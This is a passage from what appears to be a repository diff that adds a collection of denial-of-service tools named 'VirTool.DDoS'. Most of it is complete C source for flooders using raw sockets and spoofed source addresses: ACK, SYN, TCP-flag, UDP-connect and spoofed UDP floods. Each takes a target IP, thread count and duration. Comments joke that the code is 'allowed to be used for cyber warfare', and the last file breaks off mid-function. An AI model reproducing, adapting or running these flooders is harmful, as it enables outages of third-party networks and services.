sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
struct thread_data td[num_threads];
for(i = 0;i<num_threads;i++){
td[i].thread_id = i;
td[i].sin= sin;
td[i].list_node = current;
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
}
fprintf(stdout, "Starting flood...\n");
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

1121
libs/VirTool.DDoS.RUDY.c Normal file
View File

File diff suppressed because it is too large Load Diff

216
libs/VirTool.DDoS.SACK.c Normal file
View File

@ -0,0 +1,216 @@
/*
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
*/
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 65534
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = rand();
tcph->seq = rand();
tcph->ack_seq = rand();
tcph->res2 = 0;
tcph->doff = 5;
tcph->ack = 1;
tcph->window = htons(65535);
tcph->check = 0;
tcph->urg_ptr = 0;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = rand();
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = rand();
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 5){
fprintf(stderr, "Improper ACK flood parameters!\n");
fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[2]);
int maxpps = atoi(argv[3]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 100;
int i;
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stdout, "Starting Flood...\n");
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

BIN
libs/VirTool.DDoS.SENTINEL.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.DDoS.SLOWLORIS.a Normal file
View File

Binary file not shown.

BIN
libs/VirTool.DDoS.SNMP.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.DDoS.SSDP.7z Normal file
View File

Binary file not shown.

217
libs/VirTool.DDoS.SSYN.a.c Normal file
View File

@ -0,0 +1,217 @@
// Improved SSYN Script - random ports, random flags. by SPAI3N.
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <time.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
char ip[17];
snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(rand()%54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr(ip);
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(rand()%65535);
tcph->seq = rand();
tcph->ack_seq = 0;
tcph->res1 = 0;
tcph->res2 = 0;
tcph->doff = 5;
tcph->psh = 0;
tcph->syn = 1;
tcph->window = htons(65535);
tcph->check = 0;
tcph->urg_ptr = 0;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(rand()%54321);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons(rand()%54321);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
int psh = 0;
int res1 = 0;
int res2 = 0;
while(1)
{
if(psh > 1) psh = 1;
if(res1 > 4) res1 = 0;
if(res2 > 3) res2 = 0;
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
setup_ip_header(iph);
setup_tcp_header(tcph);
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
tcph->dest = htons(rand()%65535);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->ack_seq = 1;
tcph->psh = psh;
tcph->res1 = res1;
tcph->res2 = res2;
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
psh++;
res1++;
res2++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 5){
fprintf(stdout, "ISSYN v1.0 - Improved by Spai3N\nInvalid parameters!\nUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
srand(time(0));
int num_threads = atoi(argv[2]);
int maxpps = atoi(argv[3]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
fprintf(stderr, "Start flooding ...\n", argv[1]);
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stderr, "Flooding: %s\n", argv[1]);
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

201
libs/VirTool.DDoS.SSYN.b.c Normal file
View File

@ -0,0 +1,201 @@
/*
* This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
*/
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(5678);
tcph->seq = rand();
tcph->ack_seq = rand();
tcph->res2 = 0;
tcph->doff = 5;
tcph->syn = 1;
tcph->fin = 1;
tcph->window = rand();
tcph->check = 0;
tcph->urg_ptr = 0;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(floodport);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons(floodport);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[3]);
floodport = atoi(argv[2]);
int maxpps = atoi(argv[4]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stdout, "Starting Flood...\n");
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

269
libs/VirTool.DDoS.STCP.c Normal file
View File

@ -0,0 +1,269 @@
/* STCP - AnonnPL, look at TeamSpeakCrack.com */
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
int ack,syn,psh,fin,rst,urg,ptr,res2,seq;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(rand()%54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr("8.8.8.8");
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(rand()%65535);
tcph->seq = rand();
tcph->ack = ack;
tcph->ack_seq = seq;
tcph->psh = psh;
tcph->fin = fin;
tcph->rst = rst;
tcph->res2 = res2;
tcph->doff = 5;
tcph->syn = syn;
tcph->urg = urg;
tcph->urg_ptr = ptr;
tcph->window = htonl(65535);
tcph->check = 0;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(floodport);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons(floodport);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 7){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target IP> <port> <threads> <pps limiter, -1 for no limit> <time> <ack,syn,psh,fin,rst,urg,ptr,res2,seq>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[3]);
floodport = atoi(argv[2]);
int maxpps = atoi(argv[4]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
//TCP FLAGS
if(strstr(argv[6], "ack"))
ack = 1;
else
ack = 0;
if(strstr(argv[6], "seq"))
seq = 1;
else
seq = 0;
if(strstr(argv[6], "psh"))
psh = 1;
else
psh = 0;
if(strstr(argv[6], "fin"))
fin = 1;
else
fin = 0;
if(strstr(argv[6], "rst"))
rst = 1;
else
rst = 0;
if(strstr(argv[6], "res2"))
res2 = 1;
else
res2 = 0;
if(strstr(argv[6], "syn"))
syn = 1;
else
syn = 0;
if(strstr(argv[6], "urg"))
urg = 1;
else
urg = 0;
if(strstr(argv[6], "ptr"))
ptr = 1;
else
ptr = 0;
//FLAGS END
int multiplier = 20;
int i;
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stdout, "Starting Flood...\n");
fprintf(stdout, "Code by Anonn\n");
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

49
libs/VirTool.DDoS.STD.c Normal file
View File

@ -0,0 +1,49 @@
/* STD.C By stackd - (root@stackd.net) Define strings to what you feel fit */
#define STD2_STRING "std"
#define STD2_SIZE 50
#include <stdio.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
int echo_connect(char *, short);
int echo_connect(char *server, short port)
{
struct sockaddr_in sin;
struct hostent *hp;
int thesock;
hp = gethostbyname(server);
if (hp==NULL) {
printf("Unknown host: %s\n",server);
exit(0);
}
printf(" STD.C -- Packeting %s:%d\n ", server, port);
bzero((char*) &sin,sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(port);
thesock = socket(AF_INET, SOCK_DGRAM, 0);
connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
return thesock;
}
main(int argc, char **argv)
{
int s;
if(argc != 3)
{
fprintf(stderr, "[STD2.C BY STACKD] Syntax: %s host port\n",argv[0]);
exit(0);
}
s=echo_connect(argv[1], atoi(argv[2]));
for(;;)
{
send(s, STD2_STRING, STD2_SIZE, 0);
}
}

184
libs/VirTool.DDoS.SUDP.c Normal file
View File

@ -0,0 +1,184 @@
/*
This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
*/
#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static uint32_t Q[4096], c = 362436;
struct thread_data{
int throttle;
int thread_id;
struct sockaddr_in sin;
};
void init_rand(uint32_t x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++)
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
}
uint32_t rand_cmwc(void)
{
uint64_t t, a = 18782LL;
static uint32_t i = 4095;
uint32_t x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
char *myStrCat (char *s, char *a) {
while (*s != '\0') s++;
while (*a != '\0') *s++ = *a++;
*s = '\0';
return s;
}
char *replStr (char *str, size_t count) {
if (count == 0) return NULL;
char *ret = malloc (strlen (str) * count + count);
if (ret == NULL) return NULL;
*ret = '\0';
char *tmp = myStrCat (ret, str);
while (--count > 0) {
tmp = myStrCat (tmp, str);
}
return ret;
}
unsigned short csum (unsigned short *buf, int nwords)
{
unsigned long sum;
for (sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + 1028;
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = IPPROTO_UDP;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_udp_header(struct udphdr *udph)
{
udph->source = htons(5678);
udph->check = 0;
char *data = (char *)udph + sizeof(struct udphdr);
data = replStr("\xFF" "\xFF" "\xFF" "\xFF", 256);
udph->len=htons(1028);
}
void *flood(void *par1)
{
struct thread_data *td = (struct thread_data *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin = td->sin;
char new_ip[sizeof "255.255.255.255"];
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_udp_header(udph);
udph->dest = htons (rand() % 20480);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
int throttle = td->throttle;
uint32_t random_num;
uint32_t ul_dst;
init_rand(time(NULL));
if(throttle == 0){
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
random_num = rand_cmwc();
ul_dst = (random_num >> 24 & 0xFF) << 24 |
(random_num >> 16 & 0xFF) << 16 |
(random_num >> 8 & 0xFF) << 8 |
(random_num & 0xFF);
iph->saddr = ul_dst;
udph->source = htons(random_num & 0xFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
}
} else {
while(1){
throttle = td->throttle;
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
random_num = rand_cmwc();
ul_dst = (random_num >> 24 & 0xFF) << 24 |
(random_num >> 16 & 0xFF) << 16 |
